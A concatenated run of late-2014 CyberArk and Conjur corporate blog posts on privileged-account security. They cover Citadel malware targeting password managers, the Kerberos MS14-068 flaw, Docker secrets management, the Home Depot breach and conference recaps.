Faced with the prospect of remembering passwords for multiple websites and offline applications, people are increasingly using password managers so they don’t have to remember their credentials. While a significant convenience, they also represent a valuable target for hackers – compromising these password managers can give attackers user credentials that can lead to sensitive personal and business assets.

Password managers like KeePass for instance, allow users to create a password-secured database containing listings of user names and passwords. Password managers can be a suitable place for private accounts credentials like Facebook and Twitter, and in some cases, work stations and network access credentials.

However, according to a recent Computerworld article, Citadel malware is infamous for compromising “online banking credentials and other financial information by modifying banking sites on the fly when opened by users in their local browsers.” To compromise password managers, the malware was reconfigured to initiate key-logging when the managers are running, hence granting the attackers access to the secure passwords database.

This type of compromise does not give an attacker direct access to a target network, but provides a foot in the door by collecting business credentials that are often re-used for corporate assets.

Through this, attackers have turned another security obstacle into a possible jackpot.

Access to core assets requires privileged credentials – cyber attackers know this which is why they’re highly sought after.  These credentials, either collected from password managers or sniffed out somewhere else, allow the attackers to easily maneuver and even manipulate the businesses very own defenses such as anti-virus and intrusion detections systems.

So what should be the best practice of handling sensitive passwords?

The short answer is: take the user out of the equation

The first part of the problem is how to store sensitive passwords – in this case, privileged accounts. Take our Enterprise Password Vault for example. The architecture itself works like a bank vault. Each vault contains a collection of user-defined ‘safes’ where access is limited to a user or group. This means that each user or group may manage their own passwords without giving unwanted access to other parties within the organization. The Vault is bastion-hardened, allowing only CyberArk-specific traffic in and out, and all credentials are encrypted within the individual safes. For further security, all key management is maintained by the system and every password is encrypted using a different key. Additionally, a variety of workflows can be established before a safe is used or accessed, including direct force reasoning, dual control, among others. You can get a full list here.

The second part of the problem is making sure passwords are never exposed and this can be done in a number of ways. The most basic way is by using one-time passwords, where exposure is pointless since the password won’t work beyond the initial use.  Since this isn’t always possible based on practical business needs, it’s important to have the ability to connect the credential management system directly with devices and applications so the user never has to see, copy or enter a password.

Attackers can dynamically modify their attack vectors endlessly, evading sophisticated intrusion detection systems just by using compromised legitimate credentials. The best practice for businesses is to securely store credentials and conceal them from end users to reduce the risk of losing them to the wrong hands. A comprehensive privileged account security solution is a good start. For more, have a read through our approach.

]]>
Panel Recap – Boston Cybersecurity Symposium https://www.cyberark.com/blog/panel-recap-boston-cybersecurity-symposium/ Tue, 09 Dec 2014 19:05:00 +0000 https://cyberarkvx2.wpengine.com/blog/panel-recap-boston-cybersecurity-symposium/  

On Friday of last week, I had the opportunity to participate in a panel discussion at the Boston Cybersecurity Forum, talking about Operationalizing Security in the Cloud. I was joined by a stellar crew from across the industry:

Over the course of our hour, we covered a pretty wide range of topics, from the emergent trends in the security space (more automation, the rise of the non-human actor as a threat vector, and the dissolution of the perimeter) to whether anti-virus as an industry is dead (probably not, but the freeware tools are more than good enough; refocus that spend on authz, intrusion detection, and visibility tools).

Some of the more interesting questions that come out of the interactive portion of the discussion had to do with the idea that DevOps infrastructure was changing the rules of the game for IT. As Sam pointed out at one point, the silo of infosec is an outdated model; decisions that are made “on the ground” by developers are generally not filtered through a separate team for most organizations. Although automation and continuous integration platforms have become essential components of most organizations’ product development processes, the challenges around implementing good cybersecurity have not disappeared. What has happened, however, is that they tend to be managed in conjunction with the development of the infrastructure itself — meaning that they can be subject to the same time, expertise, and urgency pressures that any DevOps project experiences.

12_09_14

One thing that all of us on the panel see as a result of this is the increased need for better visibility and control in the space. As increasingly important workloads are being moved to cloud platforms, a new set of best practices is emerging. These engagement rules have less to do with keeping people out and building strong firewalls, and more to do with the creation of situational awareness across the entire environment, often in spite of that environment’s elasticity.

Some of the ideas that we started to outline in reply to our audience were to revamp the underlying infrastructure to build universal identity for both users and non-human actors, implementing technologies and tools to help with identifying anomalous activity, and establishing strong policies for authorization to protect information at the application-level.

In a sense, this is the beginning of a security architecture for the cloud – a topic I’m excited to continue to explore in the coming months.

 

 

]]>
Every Industry, Every Company is a Potential Target of an APT Attack https://www.cyberark.com/blog/every-industry-every-company-potential-target-apt-attack/ Fri, 05 Dec 2014 15:28:02 +0000 https://www.cyberark.com/blog//

By John Worrall

[blockquote cite=”Craig Williams” caption=” Cisco Talos Security Intelligence and Research Group “]Every company has something of value to protect, something that attackers want. In today’s connected business world, everyone is a potential target.[/blockquote]

Two weeks ago, CyberArk released a new threat research report, analyzing the forensic experiences of the world’s leading cyber threat investigators in remediating the most devastating breaches.

The report identifies the commonalities across advanced attacks, enabling organizations to better understand their adversary so they can build more effective defenses against the latest threats. We’ll be blogging about the six primary findings of the report – but if you want to read them for yourself, you can download the report for free.

Finding #1:  No One is Safe

While there will always be outliers, targeted cyber-attacks are typically conducted for two primary reasons: financial gain through the monetization of stolen data or cyber-espionage.

The common belief was that unless you were a bank, credit card processor, or government (affiliated) organization, you didn’t have to worry about being the target of an attack.  After all, what does a small, low tech manufacturing company have that a Russian or Chinese cyber-attacker target could monetize?

The threat investigators in the report have traced attacks to non-traditional targets such as trucking companies and all types of professional services firms, from management consultants and auditors to litigation attorneys, frequently as a key step in an attack on a business partner. As organizations continue to strengthen defenses, attackers increasingly are looking to exploit the smaller, less security-conscious partners to gain defacto backdoor access to targeted networks.

In an increasingly interconnected world, the tactic of attacking supply chain partners has been used multiple times in some of the biggest breaches in recent memory. The reasons are simple: these soft targets provide an entry way into the networks of more secure business partners. And what we found in prior research is that while more than 60 percent of businesses allow third-party vendors remote access to their internal networks, 58 percent have no confidence their partners are properly securing and monitoring privileged access to their networks.

When it comes to espionage, gaining network access to the primary target may not be the goal. For example, one security investigator described a cyber attack against a major manufacturer of pipes and plumbing parts. Forensic evidence suggested the attackers breached the IT systems of the pipe manufacturer as an easier way to collect information about what types of energy exploration their customers were doing, based on the pipes / fittings they were buying. This is highly valuable intellectual property and easily monetized.

The threat report is full of stories like this – demonstrating why cyber security today can not be just about your business, but has to account for every touch point on the extended corporate network. This is why it’s critical identify and lock down privileged accounts within your organization, secure remote vendor access, and understand what your trusted business partners are doing to secure their own businesses.

]]>
Doing Cloud Right: Don’t Have a Big, Public Screwup https://www.cyberark.com/blog/doing-cloud-right-dont-have-a-big-public-screwup/ Fri, 05 Dec 2014 09:58:00 +0000 https://cyberarkvx2.wpengine.com/blog/doing-cloud-right-dont-have-a-big-public-screwup/  

CEO and co-founder Elizabeth Lawler was asked to be a panelist for Work-Bench‘s Enterprise Security Summit in September, where she was joined by security experts from Okta, Skyhigh Networks, and CipherCloud for the panel entitled Don’t Have A Big, Public Screwup: How To Do Cloud Right moderated by Bloomberg Businessweek.

If you couldn’t make it to the event, we’re happy to be able to share the session via video! Check it out here:

 

We’d love to hear your questions and feedback, as well – drop us a line at info@conjur.net if you’d like to be a part of the discussion!

 

 

]]>
Secrets Management: Sharks, DevOps, and Dark Alleys https://www.cyberark.com/blog/secrets-management-sharks-devops-and-dark-alleys/ Thu, 04 Dec 2014 08:05:00 +0000 https://cyberarkvx2.wpengine.com/blog/secrets-management-sharks-devops-and-dark-alleys/  

If secrets management were (painfully) made into a weekly CW drama, it would be something like a horror film trope: we’d watch our vulnerable protagonists slip from dark servers to ominously lit git repositories, tensely waiting for someone to slip from the shadows and steal them away.
In the admittedly more prosaic real world, this plot unfolds regularly.

When it goes awry — when the mechanisms of access to important systems and data are exposed — it tends to be the media that cries foul, and user data that is outlined on the metaphorical asphalt as systems are breached and careers fall apart. At this point, after so many high-profile breaches over the past 2 years, the story is nearly a trope unto itself.

Why? Is this (mis)management due to a lack of product solutions, good intentions executed not as well, or just a nascent complacency vis a vis, “it won’t happen to me”?

The fact is, security and convenience are often at odds. For modern infrastructure — the kind built by DevOps teams designing around principles of scalability, automation, and elasticity — secrets represent the “how” of access management. API keys, credentials, and certificates are among the more common types of data that broker both user-to-service and service-to-service connectivity, and making them available to code and people is a requirement that often gets balanced poorly against keeping them highly secure.

12_04_14

Make access mechanisms hard to use, and there’s an immediate negative: things break. Distribute secrets widely and there’s a theoretical negative: something bad will happen in the future.

This trade-off plays to well-known blind spot, and “do-ers” — like DevOps people — can be particularly susceptible to it given the sheer volume of work and urgency that they operate under. The weakness is inherent to human nature itself; risk assessment is not something we’re good at. 10 years ago, in an oft-quoted interview, Bruce Schneier quipped, “More people are killed every year by pigs than by sharks, which shows you how good we are at evaluating [it].”

As foundational as the storage, distribution, and auditability of secrets is for protecting important data, many organizations have their secrets moving through channels that are less-than-secure on a daily basis: emails, text messages, chats, Github repos, shared VM images, Docker images, etc..
Problematically, none of these were designed to deal with this kind of data, and there is often no audit trail available for how the information moved into or out of them. This isn’t simply a “good housekeeping” problem — it’s an essential weakness in architecting defensible infrastructure.

Balancing technical elegance and simplicity (which are of obvious importance to DevOps) with robust, secure, well-designed secrets management is not a trivial problem. It’s also not one that most teams are primarily concerned with — unless you’re a security company, keeping API keys safe and audited is likely not why you go to work every day. Conjur is a purpose built permissions and secrets management platform, designed to make both easy.

 

]]>
The Privileged Aspect of the Recent Kerberos Vulnerability https://www.cyberark.com/blog/privileged-aspect-recent-kerberos-vulnerability/ Wed, 03 Dec 2014 20:01:19 +0000 https://www.cyberark.com/blog//

By John Worrall

A rare, out-of-band patch from Microsoft a couple of weeks ago once again reminds us all that targeted attackers are constantly going after privileged accounts. Microsoft pushed out an emergency patch to address a critical vulnerability in Microsoft Windows Kerberos KDC. According to the Microsoft Security Bulletin, the vulnerability, “could allow an attacker to elevate unprivileged domain user account privileges to those of the domain administrator account.”

This vulnerability is severe, as it essentially bypasses the established privileged controls making it possible to perform privileged operations with a hijacked standard user account. Attackers exploiting this vulnerability will have the ability to compromise any computer in the domain, including domain controllers.

Microsoft has patched this vulnerability, but it’s another reminder that attackers covet access and operational powers associated with privileged accounts. In fact, most targeted attacks are focused on gaining these privileges, first and foremost, by stealing the credentials for these accounts as was born out in a recent threat research report we conducted.

In that report we interviewed six leading threat investigation teams from leading firms and found more than 80% of serious cyber attacks exploit privileged accounts at some point in the process. Threat investigators from Deloitte explain, “Privileged accounts are a hall pass that can get attackers where they want to go without constraints. It enables them to traverse the network without hindrance.”

There are constantly new vulnerabilities being found even in the most established controls, such as SSL (Heartbleed), SSH (Shellshock) and now Microsoft’s implementation of Kerberos. Stopping privileged accounts exploitation is often an organization’s last line of defense before a data breach, which highlights the need for anomaly detection and privileged user behavior monitoring. With proper control of privileged accounts in place and anomaly detection employed to detect the abuse of privileged accounts, it becomes possible to mitigate these targeted attacks. As Jim Aldridge of Mandiant observes in CyberArk’s report, “At this point, it’s critical to detect attacker movements, because it’s basically the last chance you have before they steal data.”

]]>
Tales from the Field – Authz Compliance Webinar https://www.cyberark.com/blog/tales-from-the-field-authz-compliance-webinar/ Mon, 01 Dec 2014 18:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/tales-from-the-field-authz-compliance-webinar/  

It’s hard to believe, but we’re at the end of 2014 — and what a doozy of a year. Between the recent Sony breach to the continued struggles for compliance at the VA, from Code Spaces to Active Directory, a consistent theme of the year past has been the struggle to understand security not only in terms of the perimeter, but also as a function of authentication, authorization, and audit.

12_01_14

In the third and final in our series of authorization-focused webinars for 2014, we’re very excited to be joined by special guest panelist Dan Kamalic. Dan is a cloud architect with GNS Healthcare, where he helped identify and implement Conjur to address a range of authz and compliance-related needs. We’ll be hosting a live discussion with Dan and the Conjur team on December 16 at 1pm EDT, talking about both the broader changes that are driving the need for better authorization security and authz compliance, as well as the specifics of using Conjur at GNS Healthcare.

We’re really excited to have Dan joining us, and hope you will, too. You can register for the session by clicking the “Register Now” button below:

We’ll be setting aside lots of time to take questions from the audience, as well; this is a great chance to ask a real presenter what their experiences were when implementing Conjur, what the alternatives they considered were, and what authorization-related advice and insight they’d offer to anyone just getting started with a major cloud initiative.

And, of course, if you’d like to follow along with your own free trial of Conjur, you can sign up any time. It’s simple and fast – just click here!

 

]]>
Webinar Recap – Securing Docker with Conjur https://www.cyberark.com/blog/webinar-recap-securing-docker-with-conjur/ Tue, 25 Nov 2014 17:36:00 +0000 https://cyberarkvx2.wpengine.com/blog/webinar-recap-securing-docker-with-conjur/  

Docker is one of the hottest and most hyped technologies around, but for many organizations, there are still pretty significant questions about how to secure it for enterprise use.

11_25_14

In this technical webinar on “Securing Docker with Conjur”, CTO Kevin Gilpin and VP and Founding Member Kevin O’Brien discuss the uses of Docker, look at some of the more common bad practices and insecure approaches to its use, and examine how to create and enforce real-time security in a Docker deployment through the use of Conjur, without adding counteractive steps slowing processes or forcing the use of developer work-arounds.

Watch now to learn the best practices for securing Docker, including:

  1. Not storing secrets in Docker images themselves
  2. Avoiding anti-patterns that trade convenience for security
  3. Ensuring a complete audit trail is available around Docker use
  4. Making security an enabler, not a disabler
  5. Defining and enforcing a Development / Test / Production separation and workflow policy

 

]]>
CVE-2014-6324: Insider Threat and Active Directory https://www.cyberark.com/blog/cve-2014-6324-insider-threat-and-active-directory/ Mon, 24 Nov 2014 09:30:00 +0000 https://cyberarkvx2.wpengine.com/blog/cve-2014-6324-insider-threat-and-active-directory/  

Microsoft remains a huge force in enterprise IT, both in the data center and more recently as a cloud infrastructure-as-a-service (IaaS) player. Active Directory is the most widely deployed and adopted directory, authentication, and authorization solution with over 95% of global businesses using AD as their system of record.

Over the last three decades, it has become the basis for numerous internal security and compliance controls, and many organizations attempt to meet their regulatory compliance requirements for cybersecurity through a complex mesh of AD groups and policies. However, the recent announcement of a critical flaw in the Kerberos implementation in Active Directory underscores why relying on black box cryptography solutions for privileged user management is not the way forward for next generation infrastructures.

Broadly, we look at Conjur and its cryptographic and token code (which is all open source — you can see some of it at SloSilo on GitHub) as being a stronger alternative. Currently in use by organizations including Netflix, OpenDNS, Rally Software Development, Puppet Labs, and more), all of these companies have adopted Conjur to handle authorization, secrets management and distribution, and regulatory response, and can personally validate that similar vulnerabilities do not exist in the SloSilo code we use.

So, why is Active Directory not the preferred system for these organizations? To understand that, let’s begin by looking more closely at this vulnerability in particular.

11_24_14

Understanding CVE-2014-6324

In early November, Mitre announced CVE-2014-6324, a critical bug in Microsoft’s domain controller code that allows for a remote elevation of privilege attack, with Windows Server 2008R2 and below noted as being the most vulnerable of systems. A security bulletin has subsequently been released (MS14-068).

In essence, the issue here is architectural; a user who holds valid domain credentials of any kind — for example, a low-level administrator or even a former employee who has not been fully expunged from your network — can forge an important part of the token exchange with the Key Distribution Center (or “KDC”) that runs on Windows domain controller servers. In doing so, these domain users can then obtain arbitrary privileges.

There are three reasons why this is particularly devastating:

  • CVE-2014-6324 leaves you vulnerable to insider attacks: This vulnerability creates a significant threat surface for any organization running vulnerable Windows domain controllers, especially where malicious or compromised insiders can exploit the hole, elevate their privileges, and exfiltrate data (or worse);
  • Threats from malicious insiders are very common: Based on statistics from the 2013 Ponemon Cost of Cyber Crime Study, malicious insider attacks are among the most costly and common of all cybersecurity risks;
  • There is a real and significant cost associated with these kinds of breaches: The average time to resolve an attack is 32 days, with an average cost incurred during this period of $1,035,769, or $32,469 per day

Putting CVE-2014-6324 in Context

First and foremost, if you’ve built your authorization infrastructure on Active Directory, please make sure you have applied MS14-068 to any and all vulnerable machines.

Consider how the announcement of CVE-2014-6324 relates to another recent campaign launched by Microsoft, namely, the purchase of Aorato. Aorato provided an advanced persistent threat detection service and firewall for AD, specifically calling out that “your entire organization is connected to and depends on Active Directory” and is a significant source of vulnerability to advanced cyberattacks for data theft. (While Aorato’s services have been discontinued by Microsoft, we can assume that their technology will eventually be integrated in AD in some fashion.)

Next Steps

Taken more broadly, however, this vulnerability demonstrates the specific risks associated with relying on a single legacy black-box technology for authorization services. Nearly everyone runs AD because it’s an entrenched technology, and serves a number of functions fairly well. However, as you consider the evolution of your security and infrastructure choices going into 2015, hoping that no further bugs are found is not a viable strategy.

 

]]>
Cyber Threat Investigators Identify “Signature” of Most Dangerous Cyber Attacks https://www.cyberark.com/blog/cyber-threat-investigators-identify-signature-dangerous-cyber-attacks/ Wed, 19 Nov 2014 13:55:19 +0000 https://www.cyberark.com/blog//

By John Worrall

CyberArk-AllAccessPass-Infographic-1114Organizations are under constant threat of attack, yet few truly understand how they’re being attacked until it’s too late. They find themselves knee deep in the post-attack forensics effort before they really understand how cyber attackers operate and how to defend against them. This has to change if we want to stem the tide of damaging cyber attacks.

This is why CyberArk assembled a coalition of some of the world’s most experienced and knowledgeable cyber attack investigators, who were willing to share what they have learned from years of experience. That experience can help us all better understand the strategies and tactics of our adversaries.  Armed with this information, we can mount a much more effective defense and detection program to stop attacks before serious damage to the business is done.

Published today, CyberArk’s inaugural threat report identifies the compromise and misuse of privileged accounts as a key signature across targeted cyber attacks and security breaches.

Developed in cooperation with Cisco Talos Security Intelligence, Deloitte Financial Advisory Service, Deloitte & Touche Cyber Risk Services, Mandiant (a FireEye company), the Advanced Cyber Defense team at RSA and the Verizon RISK Team, the report analyzed the forensic experiences of these companies as they investigated the world’s most serious security breaches.

The report covers a wide range of first-hand accounts, learnings and warnings from which to build more effective defenses – far too many for this blog post and I encourage you to read it for yourself. Taken together, the experiences of these threat response organizations clearly outline that the battleground has moved inside the network and the first thing attackers will do is look to steal and exploit privileged access.

It’s more important than ever that organizations change their mindset and start looking at privileged account security as the new first line of defense. Protecting the enterprise starts by locking down these ‘all access passes’ that enable attackers to traverse a network without hindrances, destroy evidence of their activities, and establish redundant access points and backdoors that make it nearly impossible to keep them off your internal networks.

We’ll be blogging more about the report in the coming weeks, however, you can read the full report now.  It is available for free here: www.cyberark.com/threat-report

]]>
Topics and Themes from Re:Invent https://www.cyberark.com/blog/topics-and-themes-from-reinvent/ Wed, 19 Nov 2014 14:40:00 +0000 https://cyberarkvx2.wpengine.com/blog/topics-and-themes-from-reinvent/  

With Re:Invent behind us, we took a step back and looked at the entire set of conversations that we had while on the show floor and attempted to tease out some of the themes, trends, and topics that attracted the most attention.

We’ve posted previously about three of the major themes that drove the most interest and attention from the show in general; it was interesting to see how many of these came out in our booth discussions, as well.

What jumps out at us here are the high number of tool-specific conversations we had. Security, permissions, secrets management, and audit for for Docker and Jenkins were all consistently brought up by visitors to the Conjur booth. As we demonstrated our new user interface and walked through the reporting functionality we’ve created, another major theme — using Conjur for audit and compliance — was brought up by the folks we were talking to.

11_19_14

We expect that creating a strong, audited, security-focused set of permissions and secrets management workflows will be an area of interest, more so now than ever before. Conjur can be used to support a variety of regulatory requirements (HIPAA, SOX, PCI-DSS, FISMA, NIST, and more); in doing so, it allows DevOps and IT teams to create a secure, cross-platform authorization platform that can quickly and comprehensively show all authz events and policy updates.

One other area of special interest coming out of the event was integrating Conjur with Docker. We are addressing this specifically on 11/25, at 1pm EDT – we’ll be doing a live setup of the system, and showing how to move secrets out of Docker containers and into Conjur.

There is still time to register for the session by clicking here.

 

 

]]>
AWS Re:Invent 2014 – Day 2 https://www.cyberark.com/blog/aws-reinvent-2014-day-2/ Thu, 13 Nov 2014 12:46:00 +0000 https://cyberarkvx2.wpengine.com/blog/aws-reinvent-2014-day-2/  

Halfway through the AWS Re:Invent 2014 conference, three major themes have emerged:

  • Software-defined infrastructure is real and is being used by organizations that would not have imagined “going cloud” even 2-3 years ago
  • The concept of perimeter is well and truly dead. With software-defined systems, your entire IT stack can be killed and rebuilt in minutes; security and risk models must either adapt to embrace a permissions/secrets/audit framework, or become irrelevant
  • Information security requirements aren’t changing; from regulatory compliance to protecting PCI and PII data, organizations need a coherent and cohesive security strategy for their modern(izing) infrastructure.

During Wednesday’s keynote, the AWS team announced a number of new features that demonstrate the importance of protecting sensitive data, systems, and access within AWS itself. Here at Conjur, we’re very excited to see more attention being paid to protecting the data, services, and environments that comprise what we call the “Modern Infrastructure”.

11_13_14

The threat surface that modern infrastructure exposes is largely defined by access and authorization considerations. From the moment that a user, host, microservice, or code element comes into existence, it is critically important that it be inventoried, granted identity, and assigned appropriate and well-audited permissions.

Encrypting information with strong key management is an important component in that Modern Infrastructure, and wrapping a program for managing encryption into a larger security initiative focused on monitoring, managing, securing, and auditing authorization and access is essential to ensuring that sensitive data is not inadvertently accessed or exfiltrated from these new environments.

We’d love to hear what you’re hearing, seeing, and doing within your organization. Come see us at booth K6 all day today!

 

]]>
Conjur Talks Authorization, Permissions, and Secrets at Re:Invent https://www.cyberark.com/blog/conjur-talks-authorization-permissions-and-secrets-at-reinvent/ Tue, 11 Nov 2014 12:03:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-talks-authorization-permissions-and-secrets-at-reinvent/  

Conjur will be on the show floor and in the Venetian, to talk about DevOps Security at AWS Re:Invent, discussing authorization, permissions, and secrets management for modern infrastructure!

Conjur allows enterprises to monitor, manage, secure, and audit highly automated and complex modern infrastructure. Backed by a strong permissions management and role-based access control model, Conjur allows information security, development, and operations teams to build access and authorization policies, manage and distribute secrets securely, and easily meet complete audit and compliance requirements.

11_11_14

Conjur will be showing off its authorization platform all week at booth K6 at the Venetian. In addition, CTO and co-founder Kevin Gilpin will be hosting two 2-hour hackathon sessions on site on Wednesday afternoon, demonstrating and helping teams secure their modern infrastructure environments without slowing down the pace of innovation and deployment. More details and registration information can be found here.

Additionally, Conjur staff will be on-hand to show off the new Conjur Audit functionality, with its easy-to-view user interface and full authorization audit trail support. Attendees are encouraged to visit Conjur at Booth K6 to Conjur’s product and executive team, demo products, and enter to win an iPad Mini!

 

]]>
Former White House CIO Theresa Payton on Battling Cyber Threats https://www.cyberark.com/blog/former-white-house-cio-theresa-payton-battling-cyber-threats/ Tue, 11 Nov 2014 07:00:33 +0000 https://www.cyberark.com/blog//

By John Worrall

We’ve wrapped the 2014 CyberArk North American Customer Event and wanted to share some great insight that our guest keynote presenter shared. Former White House CIO, Theresa Payton, is a well-respected authority on internet security, net crime, fraud mitigation and technology implementation in the U.S. She has deep experience across both government and financial services industries, in addition to being the first woman to hold the position of White House CIO from 2006 to 2008.

Payton gave a candid, humorous presentation, discussing the current state of the cyber security industry, sharing some stories from her time at the White House. Throughout her presentation, Payton hit on a few key themes that every organization should take to heart.

Battling Cybercrime = Fighting Evil

Throughout discussions of cyber threats on the enterprise-level, Payton continually reminded us of her view that fighting cybercrime is essentially fighting evil. While the security industry would hope its efforts are making a difference, I’m sure many of us in the industry would be hesitant to label ourselves as “fighters of evil.” Yet Payton’s argument makes sense. The money amassed through the acts of cybercrime generally go on to fund things like human trafficking, child pornography, gun-running and terrorism.

Payton discussed the growing cybercrime black market and its increased demand. She told a story about working with a private company whose website “disappeared,” only to discover it was being held for a half million dollar ransom in a country outside of the jurisdiction of the FBI. Her point was to pull our noses away from the daily grind of protecting company assets, reputation and customers, and look at the bigger impact of our jobs. As Payton pointed out, there is a concerted, well organized adversary out there that likely views each company as a piece of a larger goal, and that we as security professionals should not lose track of the greater good we do – it should serve as motivation.

We Need to Change the CEO Conversation

Payton told the story of a senior White House staffer coming to sit with her IT team. He bluntly asked, “So, tell me what you all are doing to make sure we don’t get hacked.” This is a common question many CEO’s or board members ask of senior IT teams.

Payton thanked this particular senior staffer for his interest and invited him to sit in on a team exercise to practice their response to what could be considered an advanced persistent threat – someone hacking in and stealing the president’s schedule. Once the staffer was able to see first hand the importance of being able to identify and respond to a breach, Payton pulled him aside. “The truth is, technology people are uncomfortable telling executives the truth – that everything is hackable,” she said. “Even when we break up into teams of good guys versus bad guys and hack ourselves, the bad guys always get in. You just can’t protect yourself 100 percent of the time. Better questions to ask your IT team are, ‘I know it’s inevitable, but what are you doing to prevent a breach? And what steps are you taking to handle a breach if it does occur? What can I do to help you?’ These questions open up an honest dialogue around the real challenges your security and operations team are confronting.” Educating senior executives is absolutely critical to defending against cyber attacks and every organization would benefit from this process.

How Do You Measure Success in Security?

Before speaking with Payton, the senior staffer in the previous story probably would have defined her team’s success based on their ability to prevent 100 percent of breaches. But that’s not how Payton defines it. She believes it comes down to correctly identifying legitimate cyber threats, stopping breaches early and being able to find and push cybercriminals out of the network. We can’t stop every breach, but we can find them and contain them.

The bottom line is that the security industry needs to protect its most critical assets. Payton ended her talk by putting up a photo of a bike wheel secured to a pole. Clearly, the owner took steps to secure his property, however, did he manage to identify its most critical assets – whether that was its frame, its basket or its bell? Our security policies must focus on protecting the most important pieces of our business and more importantly, we must never underestimate our adversaries.

cybercriminals1112

Given the significance of privileged accounts in every advanced attack, whether it’s Edward Snowden using a privileged account to pilfer secrets from the NSA, or a third-party contractor not properly managing privileged connections to a network as in the recent retail breaches, protecting your most critical assets hinge on privileged account security.

]]>
Your Last Line of Defense Should be Your Strongest https://www.cyberark.com/blog/last-line-defense-strongest/ Mon, 10 Nov 2014 18:18:40 +0000 https://www.cyberark.com/blog//

Bloomberg Businessweek recently reported that the global cost of cybercrime is more than $400 billion. That’s a hit we take every year – and industry experts say that’s a conservative estimate. Yet despite this reality, many organizations continue to focus the lion’s share of their time, effort and resources on security tactics that try to keep attackers out. In today’s world of advanced persistent threats, the ‘perimeter’ simply isn’t reliable.  It isn’t enough.

Motivated attackers – both malicious outsiders and stealthy insiders – are after something very specific: your Privileged Account Credentials. With these in hand, the attacker’s point of origin no longer matters and perimeter defenses are rendered useless. As a disguised insider, the attacker can move easily through your network, hijacking additional accounts and elevating privileges to gain access to vast stores of information, data and control within the organization’s digital repositories. And with legitimate credentials, permissions and workflows, the attacker will look just like a legitimate employee – enabling them to hide, undetected, for months – or even years – before attacking.

Attackers are finding new ways to pose as legitimate privileged users via third-party vendor access. According to the CyberArk 2014 Global Advanced Threat Landscape Survey, 60 percent of businesses now allow third-party vendors remote access to their internal networks, and of that group, 58 percent of organizations have no confidence that third-party vendors are securing and monitoring privileged access to their network. With the wave of highly publicized attacks on major retailers via remote contractors, it’s clear that the reality is that attacks involving employees or third-party vendors pose an equally great risk to enterprise organizations.

The recent Snowden and Wikileaks revelations have brought insider threats to the forefront of the conversation and have shown the world that authorized insiders have the potential to do just as much harm as external attackers (and often, more harm). Insider threats – coming from both people who exploit legitimate access to an organization’s resources for malicious purposes and who unintentionally create vulnerabilities – were cited by more than 70 percent of information security managers as their biggest concern in a recent industry study. Dr. Phyllis Schneck, Deputy Under Secretary for Cybersecurity at the U.S. Department of Homeland Security, was recently quoted as saying, “Cybersecurity isn’t just about bits and bytes, it’s about managing people.” And in response to a growing number of insider threat cases, the FBI issued a warning to companies about the rise in attacks by current and former employees, noting these cyber attacks can cost an organization up to $3 million for each attack.

The battleground has shifted inside the network; therefore, it’s more important than ever that organizations make their last line of defense the strongest. CyberArk provides a critical cyber security layer inside the network perimeter to help you secure the heart of your enterprise.  It’s called Privileged Account Security. Check out this new, two-minute video to learn more.

 

Let’s face it: We may not know who “they” are, and we may not know when they’re coming, but we know what they’re after.  CyberArk can help.

]]>
Lessons from The Home Depot Breach https://www.cyberark.com/blog/lessons-from-the-home-depot-breach/ Fri, 07 Nov 2014 12:11:00 +0000 https://cyberarkvx2.wpengine.com/blog/lessons-from-the-home-depot-breach/  

Security researcher Brian Krebs published an article today that detailed how the Home Depot breach yielded up not only the usernames and passwords for their customer base, but also more than 50,000,000 email addresses.

Like the Target breach of 2013, it appears that the criminals got in through an escalation-of-privileges attack, using vendor credentials to gain illegitimate access to the company’s network, and then using that access to work their way up the food chain through a series of exploits and malware tools that were (apparently) custom-built to penetrate the Home Depot security perimeter.

Over the coming weeks, we expect to see coverage around that malware, its design and deployment, and how it was used to gain access to customer credentials and data. While the story so far is that no credit card (PCI) or personally identifiable information (PII) was gained, it may end up being the case that systems containing that kind of critically sensitive information were in fact accessed, especially if the attackers were deploying tools designed to do so.

11_07_14

Start at the Beginning

What’s important to note here is that the attack started with stolen credentials from a vendor. This was not a failure to manage a firewall properly, or a lack of security patches on a server — it was a compromised but valid secret (credentials) being used by someone who should not have had the authorization to do so.

This breach, like Target before it, underscores how important it is to have a security posture that is not exclusively focused on protecting against perimeter-based attack. Authz failures are often the simplest to execute: pose as a vendor or grab a username and password through social engineering, and you’re in. Unless you have a robust permissions and secrets management framework built into your infrastructure, it’s game over.

A better approach here might have been to layer in those secrets and permissions systems from day one. One model that would have worked:

  • Home Depot could have established a bastion host that authenticated vendors prior to gaining network access, with inspection of IP range and more robust (MFA) identification
  • Once authenticated, authorization could have been highly restricted, for example, via one-time token distribution into ephemeral storage with highly limited access rights, ideally through fully and immutably audited service broker systems that prevented any direct network access
  • Those authorization tokens and the originating credentials could and should have been rotated regularly, making it impossible to gain access with old data
  • All subsequent internal access should have been highly regulated, such that no escalation path existed for a vendor account under any circumstances

Build Least Privilege In From Day One

 

The work that would have gone into this sort of system may appear daunting, but had Home Depot dedicated the effort before they were publicly hacked, they could have saved a tremendous amount of time and expense that’s now being dedicated to a (very embarrassing) response.

More importantly, consumer data would not have been stolen, and 50 million people wouldn’t have to keep an eye on their accounts for the foreseeable future, wondering if their information was being used illicitly. There are no indications of this so far, and with luck it won’t happen — none of us at Conjur are believers in fear as a sales tactic — but we do believe passionately in the importance of getting security right when you’re the custodian of your customers’ data.

Least privilege, separation of duties, and zero-trust networking aren’t just buzzwords. Isn’t it time to make them requirements for any modern network infrastructure?

 

]]>
2014 Security Breaches Report https://www.cyberark.com/blog/2014-security-breaches-report/ Thu, 06 Nov 2014 16:58:00 +0000 https://cyberarkvx2.wpengine.com/blog/2014-security-breaches-report/  

In 2013, “84 percent of CEOs and 82 percent of CIOs stated that they believed that their cybersecurity programs were currently effective” (source). 2014 security breaches, or at least those that were known about, rose 62% in comparison to the year prior.

More of the same isn’t working.

A security education vendor released an infographic this week that pointed out that the cybersecurity space is facing a dual challenge: there are simultaneously more advanced attacks taking place than ever before, but also fewer trained professionals who can address them, and downward pressure on the educational system that is supposedly training the next generation of InfoSec experts.

In 2014, the average detection times for advanced persistent attacks rose to just under eight months. The net cost to the US economy of known breaches rose to $3 trillion. In spite of this, 62% of organizations haven’t invested in cybersecurity training programs in 2014, at all; 1 in 3 security teams aren’t familiar with how to defend against advanced hacking attempts against their systems and organizations.

It’s a bleak picture.

Going into Battle with The Army You Have

